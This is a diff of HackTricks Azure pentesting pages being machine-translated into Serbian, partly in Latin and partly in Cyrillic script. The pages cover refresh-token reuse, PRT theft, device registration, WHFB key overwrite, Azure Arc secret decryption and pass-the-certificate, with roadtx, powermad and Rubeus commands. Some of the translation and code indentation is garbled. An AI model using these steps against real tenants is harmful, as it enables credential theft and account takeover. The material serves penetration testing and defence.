+### Dobijanje različitih klijenata i opsega
 ```python
 # Code from https://github.com/secureworks/family-of-client-ids-research
 microsoft_office_client = msal.PublicClientApplication("d3590ed6-52b3-4102-aeff-aad2292ab01c")
 microsoft_office_bearer_tokens_for_graph_api = (
-    # This is a different client application than we used in the previous examples
-    microsoft_office_client.acquire_token_by_refresh_token(
-        # But we can use the refresh token issued to our original client application
-        azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"),
-        # And request different scopes too
-        scopes=["https://graph.microsoft.com/.default"],
-    )
+# This is a different client application than we used in the previous examples
+microsoft_office_client.acquire_token_by_refresh_token(
+# But we can use the refresh token issued to our original client application
+azure_cli_bearer_tokens_for_outlook_api.get("refresh_token"),
+# And request different scopes too
+scopes=["https://graph.microsoft.com/.default"],
+)
 )
 # How is this possible?
 pprint(microsoft_office_bearer_tokens_for_graph_api)
 ```
-
 ## References
 
 - [https://github.com/secureworks/family-of-client-ids-research](https://github.com/secureworks/family-of-client-ids-research)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-device-registration.md b/src/pentesting-cloud/azure-security/az-device-registration.md
index 5fe503c0b..ab6318848 100644
--- a/src/pentesting-cloud/azure-security/az-device-registration.md
+++ b/src/pentesting-cloud/azure-security/az-device-registration.md
@@ -2,23 +2,21 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne Informacije
 
-When a device joins AzureAD a new object is created in AzureAD.
+Kada uređaj pristupi AzureAD, novi objekat se kreira u AzureAD.
 
-When registering a device, the **user is asked to login with his account** (asking for MFA if needed), then it request tokens for the device registration service and then ask a final confirmation prompt.
+Kada se registruje uređaj, **korisnik se traži da se prijavi sa svojim nalogom** (tražeći MFA ako je potrebno), zatim se traže tokeni za servis registracije uređaja i zatim se traži konačna potvrda.
 
-Then, two RSA keypairs are generated in the device: The **device key** (**public** key) which is sent to **AzureAD** and the **transport** key (**private** key) which is stored in TPM if possible.
-
-Then, the **object** is generated in **AzureAD** (not in Intune) and AzureAD gives back to the device a **certificate** signed by it. You can check that the **device is AzureAD joined** and info about the **certificate** (like if it's protected by TPM).:
+Zatim, generišu se dva RSA para ključeva u uređaju: **uređajni ključ** (**javni** ključ) koji se šalje u **AzureAD** i **transportni** ključ (**privatni** ključ) koji se čuva u TPM ako je moguće.
 
+Zatim, **objekat** se generiše u **AzureAD** (ne u Intune) i AzureAD vraća uređaju **sertifikat** potpisan od strane njega. Možete proveriti da li je **uređaj povezan sa AzureAD** i informacije o **sertifikatu** (kao što je da li je zaštićen TPM-om).
 ```bash
 dsregcmd /status
 ```
+После регистрације уређаја, **Primary Refresh Token** захтева модул LSASS CloudAP и даје се уређају. Уз PRT се такође испоручује **кључ сесије шифрован тако да само уређај може да га дешифрује** (користећи јавни кључ транспортног кључа) и **потребан је за коришћење PRT.**
 
-After the device registration a **Primary Refresh Token** is requested by the LSASS CloudAP module and given to the device. With the PRT is also delivered the **session key encrypted so only the device can decrypt it** (using the public key of the transport key) and it's **needed to use the PRT.**
-
-For more information about what is a PRT check:
+За више информација о томе шта је PRT погледајте:
 
 {{#ref}}
 az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
@@ -26,19 +24,18 @@ az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
 
 ### TPM - Trusted Platform Module
 
-The **TPM** **protects** against key **extraction** from a powered down device (if protected by PIN) nd from extracting the private material from the OS layer.\
-But it **doesn't protect** against **sniffing** the physical connection between the TPM and CPU or **using the cryptograpic material** in the TPM while the system is running from a process with **SYSTEM** rights.
+**TPM** **штити** од извлачења кључева **из уређаја** који је искључен (ако је заштићен ПИН-ом) и од извлачења приватног материјала из ОС слоја.\
+Али **не штити** од **ослушкивања** физичке везе између TPM-а и ЦПУ-а или **коришћења криптографског материјала** у TPM-у док систем ради из процеса са **SYSTEM** правима.
 
-If you check the following page you will see that **stealing the PRT** can be used to access like a the **user**, which is great because the **PRT is located devices**, so it can be stolen from them (or if not stolen abused to generate new signing keys):
+Ако погледате следећу страницу, видећете да **крађа PRT** може да се користи за приступ као **корисник**, што је одлично јер се **PRT налази на уређајима**, тако да се може украсти од њих (или ако не буде украден, злоупотребити за генерисање нових кључева за потписивање):
 
 {{#ref}}
 az-lateral-movement-cloud-on-prem/pass-the-prt.md
 {{#endref}}
 
-## Registering a device with SSO tokens
-
-It would be possible for an attacker to request a token for the Microsoft device registration service from the compromised device and register it:
+## Регистровање уређаја са SSO токенима
 
+Било би могуће да нападач затражи токен за услугу регистрације уређаја Microsoft са компромитованог уређаја и региструје га:
 ```bash
 # Initialize SSO flow
 roadrecon auth prt-init
@@ -50,49 +47,46 @@ roadrecon auth -r 01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9 --prt-cookie 
 # Custom pyhton script to register a device (check roadtx)
 registerdevice.py
 ```
-
-Which will give you a **certificate you can use to ask for PRTs in the future**. Therefore maintaining persistence and **bypassing MFA** because the original PRT token used to register the new device **already had MFA permissions granted**.
+Koji će vam dati **sertifikat koji možete koristiti za traženje PRT-ova u budućnosti**. Takođe održava postojanost i **obiđe MFA** jer je originalni PRT token korišćen za registraciju novog uređaja **već imao odobrene MFA dozvole**.
 
 > [!TIP]
-> Note that to perform this attack you will need permissions to **register new devices**. Also, registering a device doesn't mean the device will be **allowed to enrol into Intune**.
+> Imajte na umu da će vam za izvođenje ovog napada biti potrebne dozvole za **registraciju novih uređaja**. Takođe, registracija uređaja ne znači da će uređaj biti **odobren za upis u Intune**.
 
 > [!CAUTION]
-> This attack was fixed in September 2021 as you can no longer register new devices using a SSO tokens. However, it's still possible to register devices in a legit way (having username, password and MFA if needed). Check: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md).
+> Ovaj napad je ispravljen u septembru 2021. godine jer više ne možete registrovati nove uređaje koristeći SSO tokene. Međutim, još uvek je moguće registrovati uređaje na legitiman način (imajući korisničko ime, lozinku i MFA ako je potrebno). Proverite: [**roadtx**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-roadtx-authentication.md).
 
-## Overwriting a device ticket
+## Prepisivanje uređajnog tiketa
 
-It was possible to **request a device ticket**, **overwrite** the current one of the device, and during the flow **steal the PRT** (so no need to steal it from the TPM. For more info [**check this talk**](https://youtu.be/BduCn8cLV1A).
+Bilo je moguće **zatražiti uređajni tiket**, **prepisati** trenutni tiket uređaja, i tokom procesa **ukrasti PRT** (tako da nije potrebno ukrasti ga iz TPM-a. Za više informacija [**proverite ovaj govor**](https://youtu.be/BduCn8cLV1A).
 
 

 
 > [!CAUTION]
-> However, this was fixed.
+> Međutim, ovo je ispravljeno.
 
-## Overwrite WHFB key
+## Prepisivanje WHFB ključa
 
-[**Check the original slides here**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf)
+[**Proverite originalne slajdove ovde**](https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_nsec_v1.0.pdf)
 
-Attack summary:
+Sažetak napada:
 
-- It's possible to **overwrite** the **registered WHFB** key from a **device** via SSO
-- It **defeats TPM protection** as the key is **sniffed during the generation** of the new key
-- This also provides **persistence**
+- Moguće je **prepisati** **registrovani WHFB** ključ sa **uređaja** putem SSO
+- To **obara TPM zaštitu** jer se ključ **snima tokom generisanja** novog ključa
+- Ovo takođe pruža **postojanost**
 
 

 
-Users can modify their own searchableDeviceKey property via the Azure AD Graph, however, the attacker needs to have a device in the tenant (registered on the fly or having stolen cert + key from a legit device) and a valid access token for the AAD Graph.
-
-Then, it's possible to generate a new key with:
+Korisnici mogu modifikovati svoju pretraživuDeviceKey svojstvo putem Azure AD Graph, međutim, napadač treba da ima uređaj u tenant-u (registrovan u hodu ili ukraden sertifikat + ključ sa legitimen uređaj) i važeći pristupni token za AAD Graph.
 
+Zatim, moguće je generisati novi ključ sa:
 ```bash
 roadtx genhellokey -d  -k tempkey.key
 ```
-
-and then PATCH the information of the searchableDeviceKey:
+и онда PATCH информације о searchableDeviceKey:
 
 

 
-It's possible to get an access token from a user via **device code phishing** and abuse the previous steps to **steal his access**. For more information check:
+Могуће је добити access token од корисника преко **device code phishing** и злоупотребити претходне кораке да **краде његов приступ**. За више информација погледајте:
 
 {{#ref}}
 az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
@@ -107,7 +101,3 @@ az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-en
 - [https://www.youtube.com/watch?v=AFay_58QubY](https://www.youtube.com/watch?v=AFay_58QubY)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-enumeration-tools.md b/src/pentesting-cloud/azure-security/az-enumeration-tools.md
index 6a0dce1da..425813fcd 100644
--- a/src/pentesting-cloud/azure-security/az-enumeration-tools.md
+++ b/src/pentesting-cloud/azure-security/az-enumeration-tools.md
@@ -2,10 +2,10 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Install PowerShell in Linux
+## Instalirajte PowerShell na Linuxu
 
 > [!TIP]
-> In linux you will need to install PowerShell Core:
+> Na linuxu ćete morati da instalirate PowerShell Core:
 >
 > ```bash
 > sudo apt-get update
@@ -14,11 +14,11 @@
 > # Ubuntu 20.04
 > wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb
 >
-> # Update repos
+> # Ažurirajte repozitorijume
 > sudo apt-get update
 > sudo add-apt-repository universe
 >
-> # Install & start powershell
+> # Instalirajte i pokrenite powershell
 > sudo apt-get install -y powershell
 > pwsh
 >
@@ -26,58 +26,47 @@
 > curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
 > ```
 
-## Install PowerShell in MacOS
+## Instalirajte PowerShell na MacOS
 
-Instructions from the [**documentation**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4):
-
-1. Install `brew` if not installed yet:
+Uputstva iz [**dokumentacije**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4):
 
+1. Instalirajte `brew` ako još nije instaliran:
 ```bash
 /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
 ```
-
-2. Install the latest stable release of PowerShell:
-
+2. Instalirajte najnoviju stabilnu verziju PowerShell-a:
 ```sh
 brew install powershell/tap/powershell
 ```
-
-3. Run PowerShell:
-
+3. Pokrenite PowerShell:
 ```sh
 pwsh
 ```
-
-4. Update:
-
+4. Ažuriranje:
 ```sh
 brew update
 brew upgrade powershell
 ```
-
-## Main Enumeration Tools
+## Glavni alati za enumeraciju
 
 ### az cli
 
-[**Azure Command-Line Interface (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) is a cross-platform tool written in Python for managing and administering (most) Azure and Entra ID resources. It connects to Azure and executes administrative commands via the command line or scripts.
+[**Azure Command-Line Interface (CLI)**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli) je alat koji radi na više platformi, napisan u Python-u, za upravljanje i administraciju (većine) Azure i Entra ID resursa. Povezuje se sa Azure-om i izvršava administrativne komande putem komandne linije ili skripti.
 
-Follow this link for the [**installation instructions¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install).
+Pratite ovaj link za [**uputstva za instalaciju¡**](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli#install).
 
-Commands in Azure CLI are structured using a pattern of: `az   `
+Komande u Azure CLI su strukturirane koristeći obrazac: `az   `
 
 #### Debug | MitM az cli
 
-Using the parameter **`--debug`** it's possible to see all the requests the tool **`az`** is sending:
-
+Korišćenjem parametra **`--debug`** moguće je videti sve zahteve koje alat **`az`** šalje:
 ```bash
 az account management-group list --output table --debug
 ```
-
-In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can do:
+Da biste izvršili **MitM** na alatu i **proverili sve zahteve** koje šalje ručno, možete uraditi: 
 
 {{#tabs }}
 {{#tab name="Bash" }}
-
 ```bash
 export ADAL_PYTHON_SSL_NO_VERIFY=1
 export AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
@@ -90,64 +79,53 @@ export HTTP_PROXY="http://127.0.0.1:8080"
 openssl x509 -in ~/Downloads/cacert.der -inform DER -out ~/Downloads/cacert.pem -outform PEM
 export REQUESTS_CA_BUNDLE=/Users/user/Downloads/cacert.pem
 ```
-
 {{#endtab }}
 
 {{#tab name="PS" }}
-
 ```bash
 $env:ADAL_PYTHON_SSL_NO_VERIFY=1
 $env:AZURE_CLI_DISABLE_CONNECTION_VERIFICATION=1
 $env:HTTPS_PROXY="http://127.0.0.1:8080"
 $env:HTTP_PROXY="http://127.0.0.1:8080"
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 ### Az PowerShell
 
-Azure PowerShell is a module with cmdlets for managing Azure resources directly from the PowerShell command line.
+Azure PowerShell je modul sa cmdlet-ima za upravljanje Azure resursima direktno iz PowerShell komandne linije.
 
-Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell).
+Pratite ovaj link za [**uputstva za instalaciju**](https://learn.microsoft.com/en-us/powershell/azure/install-azure-powershell).
 
-Commands in Azure PowerShell AZ Module are structured like: `-Az `
+Komande u Azure PowerShell AZ Modulu su strukturirane kao: `-Az `
 
 #### Debug | MitM Az PowerShell
 
-Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending:
-
+Korišćenjem parametra **`-Debug`** moguće je videti sve zahteve koje alat šalje:
 ```bash
 Get-AzResourceGroup -Debug
 ```
-
-In order to do a **MitM** to the tool and **check all the requests** it's sending manually you can set the env variables `HTTPS_PROXY` and `HTTP_PROXY` according to the [**docs**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy).
+Da biste izvršili **MitM** na alatu i **proverili sve zahteve** koje šalje ručno, možete postaviti varijable okruženja `HTTPS_PROXY` i `HTTP_PROXY` prema [**dokumentaciji**](https://learn.microsoft.com/en-us/powershell/azure/az-powershell-proxy).
 
 ### Microsoft Graph PowerShell
 
-Microsoft Graph PowerShell is a cross-platform SDK that enables access to all Microsoft Graph APIs, including services like SharePoint, Exchange, and Outlook, using a single endpoint. It supports PowerShell 7+, modern authentication via MSAL, external identities, and advanced queries. With a focus on least privilege access, it ensures secure operations and receives regular updates to align with the latest Microsoft Graph API features.
+Microsoft Graph PowerShell je SDK koji podržava više platformi i omogućava pristup svim Microsoft Graph API-ima, uključujući usluge kao što su SharePoint, Exchange i Outlook, koristeći jedan krajnji tačku. Podržava PowerShell 7+, modernu autentifikaciju putem MSAL, spoljne identitete i napredne upite. Sa fokusom na pristup sa najmanjim privilegijama, osigurava sigurne operacije i redovno prima ažuriranja kako bi se uskladio sa najnovijim funkcijama Microsoft Graph API-ja.
 
-Follow this link for the [**installation instructions**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation).
+Pratite ovu vezu za [**uputstva za instalaciju**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation).
 
-Commands in Microsoft Graph PowerShell are structured like: `-Mg `
+Komande u Microsoft Graph PowerShell su strukturirane kao: `-Mg `
 
 #### Debug Microsoft Graph PowerShell
 
-Using the parameter **`-Debug`** it's possible to see all the requests the tool is sending:
-
+Korišćenjem parametra **`-Debug`** moguće je videti sve zahteve koje alat šalje:
 ```bash
 Get-MgUser -Debug
 ```
-
 ### ~~**AzureAD Powershell**~~
 
-The Azure Active Directory (AD) module, now **deprecated**, is part of Azure PowerShell for managing Azure AD resources. It provides cmdlets for tasks like managing users, groups, and application registrations in Entra ID.
+Azure Active Directory (AD) modul, sada **ukinut**, je deo Azure PowerShell za upravljanje Azure AD resursima. Pruža cmdlets za zadatke kao što su upravljanje korisnicima, grupama i registracijama aplikacija u Entra ID.
 
 > [!TIP]
-> This is replaced by Microsoft Graph PowerShell
-
-Follow this link for the [**installation instructions**](https://www.powershellgallery.com/packages/AzureAD).
-
-
-
+> Ovo je zamenjeno Microsoft Graph PowerShell
 
+Pratite ovu vezu za [**uputstva za instalaciju**](https://www.powershellgallery.com/packages/AzureAD).
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
index e53ceb412..579a2f21b 100644
--- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.md
@@ -4,17 +4,16 @@
 
 ### Identifying the Issues
 
-Azure Arc allows for the integration of new internal servers (joined domain servers) into Azure Arc using the Group Policy Object method. To facilitate this, Microsoft provides a deployment toolkit necessary for initiating the onboarding procedure. Inside the ArcEnableServerGroupPolicy.zip file, the following scripts can be found: DeployGPO.ps1, EnableAzureArc.ps1, and AzureArcDeployment.psm1.
+Azure Arc omogućava integraciju novih internih servera (servera pridruženih domenima) u Azure Arc koristeći metodu Grupa Politike. Da bi to olakšao, Microsoft pruža alat za implementaciju potreban za pokretanje procedure uključivanja. Unutar ArcEnableServerGroupPolicy.zip datoteke nalaze se sledeći skripti: DeployGPO.ps1, EnableAzureArc.ps1, i AzureArcDeployment.psm1.
 
-When executed, the DeployGPO.ps1 script performs the following actions:
+Kada se izvrši, DeployGPO.ps1 skripta obavlja sledeće radnje:
 
-1. Creates the Azure Arc Servers Onboarding GPO within the local domain.
-2. Copies the EnableAzureArc.ps1 onboarding script to the designated network share created for the onboarding process, which also contains the Windows installer package.
+1. Kreira Azure Arc Servers Onboarding GPO unutar lokalnog domena.
+2. Kopira EnableAzureArc.ps1 skriptu za uključivanje na određeni mrežni deo kreiran za proces uključivanja, koji takođe sadrži Windows instalacioni paket.
 
-When running this script, sys admins need to provide two main parameters: **ServicePrincipalId** and **ServicePrincipalClientSecret**. Additionally, it requires other parameters such as the domain, the FQDN of the server hosting the share, and the share name. Further details such as the tenant ID, resource group, and other necessary information must also be provided to the script.
-
-An encrypted secret is generated in the AzureArcDeploy directory on the specified share using DPAPI-NG encryption. The encrypted secret is stored in a file named encryptedServicePrincipalSecret. Evidence of this can be found in the DeployGPO.ps1 script, where the encryption is performed by calling ProtectBase64 with $descriptor and $ServicePrincipalSecret as inputs. The descriptor consists of the Domain Computer and Domain Controller group SIDs, ensuring that the ServicePrincipalSecret can only be decrypted by the Domain Controllers and Domain Computers security groups, as noted in the script comments.
+Kada se pokreće ova skripta, sys administratori treba da obezbede dva glavna parametra: **ServicePrincipalId** i **ServicePrincipalClientSecret**. Pored toga, potrebni su i drugi parametri kao što su domen, FQDN servera koji hostuje deo, i naziv dela. Dodatne informacije kao što su ID zakupca, grupa resursa, i druge potrebne informacije takođe moraju biti obezbeđene skripti.
 
+Enkriptovana tajna se generiše u AzureArcDeploy direktorijumu na određenom delu koristeći DPAPI-NG enkripciju. Enkriptovana tajna se čuva u datoteci pod nazivom encryptedServicePrincipalSecret. Dokazi o ovome mogu se naći u DeployGPO.ps1 skripti, gde se enkripcija vrši pozivanjem ProtectBase64 sa $descriptor i $ServicePrincipalSecret kao ulazima. Deskriptor se sastoji od SID-ova grupe Računara Domen i Kontrolera Domen, osiguravajući da se ServicePrincipalSecret može dekriptovati samo od strane Kontrolera Domen i grupa Računara Domen, kako je navedeno u komentarima skripte.
 ```powershell
 # Encrypting the ServicePrincipalSecret to be decrypted only by the Domain Controllers and the Domain Computers security groups
 $DomainComputersSID = "SID=" + $DomainComputersSID
@@ -23,24 +22,20 @@ $descriptor = @($DomainComputersSID, $DomainControllersSID) -join " OR "
 Import-Module $PSScriptRoot\AzureArcDeployment.psm1
 $encryptedSecret = [DpapiNgUtil]::ProtectBase64($descriptor, $ServicePrincipalSecret)
 ```
-
 ### Exploit
 
-We have the follow conditions:
+Imamo sledeće uslove:
 
-1. We have successfully penetrated the internal network.
-2. We have the capability to create or assume control of a computer account within Active Directory.
-3. We have discovered a network share containing the AzureArcDeploy directory.
-
-There are several methods to obtain a machine account within an AD environment. One of the most common is exploiting the machine account quota. Another method involves compromising a machine account through vulnerable ACLs or various other misconfigurations.
+1. Uspešno smo penetrirali unutrašnju mrežu.
+2. Imamo mogućnost da kreiramo ili preuzmemo kontrolu nad računom računara unutar Active Directory.
+3. Otkrili smo mrežno deljenje koje sadrži AzureArcDeploy direktorijum.
 
+Postoji nekoliko metoda za dobijanje računa računara unutar AD okruženja. Jedna od najčešćih je iskorišćavanje kvote računa računara. Druga metoda uključuje kompromitovanje računa računara putem ranjivih ACL-ova ili raznih drugih pogrešnih konfiguracija.
 ```powershell
 Import-MKodule powermad
 New-MachineAccount -MachineAccount fake01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
 ```
-
-Once a machine account is obtained, it is possible to authenticate using this account. We can either use the runas.exe command with the netonly flag or use pass-the-ticket with Rubeus.exe.
-
+Kada se dobije nalog mašine, moguće je autentifikovati se koristeći ovaj nalog. Možemo ili koristiti runas.exe komandu sa netonly flagom ili koristiti pass-the-ticket sa Rubeus.exe.
 ```powershell
 runas /user:fake01$ /netonly powershell
 ```
@@ -48,9 +43,7 @@ runas /user:fake01$ /netonly powershell
 ```powershell
 .\Rubeus.exe asktgt /user:fake01$ /password:123456 /prr
 ```
-
-By having the TGT for our computer account stored in memory, we can use the following script to decrypt the service principal secret.
-
+Čuvajući TGT za naš korisnički nalog u memoriji, možemo koristiti sledeći skript za dešifrovanje tajne servisnog principala.
 ```powershell
 Import-Module .\AzureArcDeployment.psm1
 
@@ -59,17 +52,12 @@ $encryptedSecret = Get-Content "[shared folder path]\AzureArcDeploy\encryptedSer
 $ebs = [DpapiNgUtil]::UnprotectBase64($encryptedSecret)
 $ebs
 ```
+Alternativno, možemo koristiti [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG).
 
-Alternatively, we can use [SecretManagement.DpapiNG](https://github.com/jborean93/SecretManagement.DpapiNG).
-
-At this point, we can gather the remaining information needed to connect to Azure from the ArcInfo.json file, which is stored on the same network share as the encryptedServicePrincipalSecret file. This file contains details such as: TenantId, servicePrincipalClientId, ResourceGroup, and more. With this information, we can use Azure CLI to authenticate as the compromised service principal.
+U ovom trenutku, možemo prikupiti preostale informacije potrebne za povezivanje sa Azure iz ArcInfo.json datoteke, koja se čuva na istom mrežnom delu kao i encryptedServicePrincipalSecret datoteka. Ova datoteka sadrži detalje kao što su: TenantId, servicePrincipalClientId, ResourceGroup i još mnogo toga. Sa ovim informacijama, možemo koristiti Azure CLI za autentifikaciju kao kompromitovani servisni principal.
 
 ## References
 
 - [https://xybytes.com/azure/Abusing-Azure-Arc/](https://xybytes.com/azure/Abusing-Azure-Arc/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md
index 2ddcbb0a5..9dcf8febd 100644
--- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md
@@ -1,43 +1,39 @@
-# Az - Local Cloud Credentials
+# Az - Lokalne Cloud Akreditivi
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Local Token Storage and Security Considerations
+## Lokalna Pohrana Tokena i Bezbednosne Razmatranja
 
-### Azure CLI (Command-Line Interface)
+### Azure CLI (Interfejs Komandne Linije)
 
-Tokens and sensitive data are stored locally by Azure CLI, raising security concerns:
+Tokeni i osetljivi podaci se lokalno čuvaju od strane Azure CLI, što izaziva bezbednosne brige:
 
-1. **Access Tokens**: Stored in plaintext within `accessTokens.json` located at `C:\Users\\.Azure`.
-2. **Subscription Information**: `azureProfile.json`, in the same directory, holds subscription details.
-3. **Log Files**: The `ErrorRecords` folder within `.azure` might contain logs with exposed credentials, such as:
-   - Executed commands with credentials embedded.
-   - URLs accessed using tokens, potentially revealing sensitive information.
+1. **Pristupni Tokeni**: Čuvaju se u običnom tekstu unutar `accessTokens.json` koji se nalazi na `C:\Users\\.Azure`.
+2. **Informacije o Pretplati**: `azureProfile.json`, u istoj direktoriji, sadrži detalje o pretplati.
+3. **Log Fajlovi**: Folder `ErrorRecords` unutar `.azure` može sadržati logove sa izloženim akreditivima, kao što su:
+- Izvršene komande sa ugrađenim akreditivima.
+- URL-ovi pristupani korišćenjem tokena, što može otkriti osetljive informacije.
 
 ### Azure PowerShell
 
-Azure PowerShell also stores tokens and sensitive data, which can be accessed locally:
+Azure PowerShell takođe čuva tokene i osetljive podatke, koji se mogu lokalno pristupiti:
 
-1. **Access Tokens**: `TokenCache.dat`, located at `C:\Users\\.Azure`, stores access tokens in plaintext.
-2. **Service Principal Secrets**: These are stored unencrypted in `AzureRmContext.json`.
-3. **Token Saving Feature**: Users have the ability to persist tokens using the `Save-AzContext` command, which should be used cautiously to prevent unauthorized access.
+1. **Pristupni Tokeni**: `TokenCache.dat`, koji se nalazi na `C:\Users\\.Azure`, čuva pristupne tokene u običnom tekstu.
+2. **Tajni Ključevi Servisnog Principala**: Ovi se čuvaju nešifrovani u `AzureRmContext.json`.
+3. **Funkcija Čuvanja Tokena**: Korisnici imaju mogućnost da trajno sačuvaju tokene koristeći komandu `Save-AzContext`, koja treba da se koristi oprezno kako bi se sprečio neovlašćen pristup.
 
-## Automatic Tools to find them
+## Automatski Alati za Pronalaženje
 
 - [**Winpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe)
 - [**Get-AzurePasswords.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/AzureRM/Get-AzurePasswords.ps1)
 
-## Security Recommendations
+## Preporuke za Bezbednost
 
-Considering the storage of sensitive data in plaintext, it's crucial to secure these files and directories by:
+Uzimajući u obzir pohranu osetljivih podataka u običnom tekstu, ključno je osigurati ove fajlove i direktorijume:
 
-- Limiting access rights to these files.
-- Regularly monitoring and auditing these directories for unauthorized access or unexpected changes.
-- Employing encryption for sensitive files where possible.
-- Educating users about the risks and best practices for handling such sensitive information.
+- Ograničiti prava pristupa ovim fajlovima.
+- Redovno pratiti i revizirati ove direktorijume zbog neovlašćenog pristupa ili neočekivanih promena.
+- Koristiti enkripciju za osetljive fajlove gde je to moguće.
+- Obrazovati korisnike o rizicima i najboljim praksama za rukovanje takvim osetljivim informacijama.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md
index f2a5f2f4d..a6d51b649 100644
--- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md
@@ -4,40 +4,32 @@
 
 ## Pass the Certificate (Azure)
 
-In Azure joined machines, it's possible to authenticate from one machine to another using certificates that **must be issued by Azure AD CA** for the required user (as the subject) when both machines support the **NegoEx** authentication mechanism.
+Na mašinama pridruženim Azure-u, moguće je autentifikovati se sa jedne mašine na drugu koristeći sertifikate koji **moraju biti izdati od strane Azure AD CA** za potrebnog korisnika (kao subjekat) kada obe mašine podržavaju **NegoEx** mehanizam autentifikacije.
 
-In super simplified terms:
+U super pojednostavljenim terminima:
 
-- The machine (client) initiating the connection **needs a certificate from Azure AD for a user**.
-- Client creates a JSON Web Token (JWT) header containing PRT and other details, sign it using the Derived key (using the session key and the security context) and **sends it to Azure AD**
-- Azure AD verifies the JWT signature using client session key and security context, checks validity of PRT and **responds** with the **certificate**.
+- Mašina (klijent) koja inicira vezu **treba sertifikat od Azure AD za korisnika**.
+- Klijent kreira JSON Web Token (JWT) zaglavlje koje sadrži PRT i druge detalje, potpisuje ga koristeći Izvedeni ključ (koristeći sesijski ključ i bezbednosni kontekst) i **šalje ga Azure AD**
+- Azure AD verifikuje JWT potpis koristeći sesijski ključ klijenta i bezbednosni kontekst, proverava validnost PRT i **odgovara** sa **sertifikatom**.
 
-In this scenario and after grabbing all the info needed for a [**Pass the PRT**](pass-the-prt.md) attack:
+U ovom scenariju i nakon prikupljanja svih informacija potrebnih za [**Pass the PRT**](pass-the-prt.md) napad:
 
-- Username
+- Korisničko ime
 - Tenant ID
 - PRT
-- Security context
-- Derived Key
-
-It's possible to **request P2P certificate** for the user with the tool [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:**
+- Bezbednosni kontekst
+- Izvedeni ključ
 
+Moguće je **zatražiti P2P sertifikat** za korisnika pomoću alata [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:**
 ```bash
 RequestCert.py [-h] --tenantId TENANTID --prt PRT --userName USERNAME --hexCtx HEXCTX --hexDerivedKey HEXDERIVEDKEY [--passPhrase PASSPHRASE]
 ```
-
-The certificates will last the same as the PRT. To use the certificate you can use the python tool [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) that will **authenticate** to the remote machine, run **PSEXEC** and **open a CMD** on the victim machine. This will allow us to use Mimikatz again to get the PRT of another user.
-
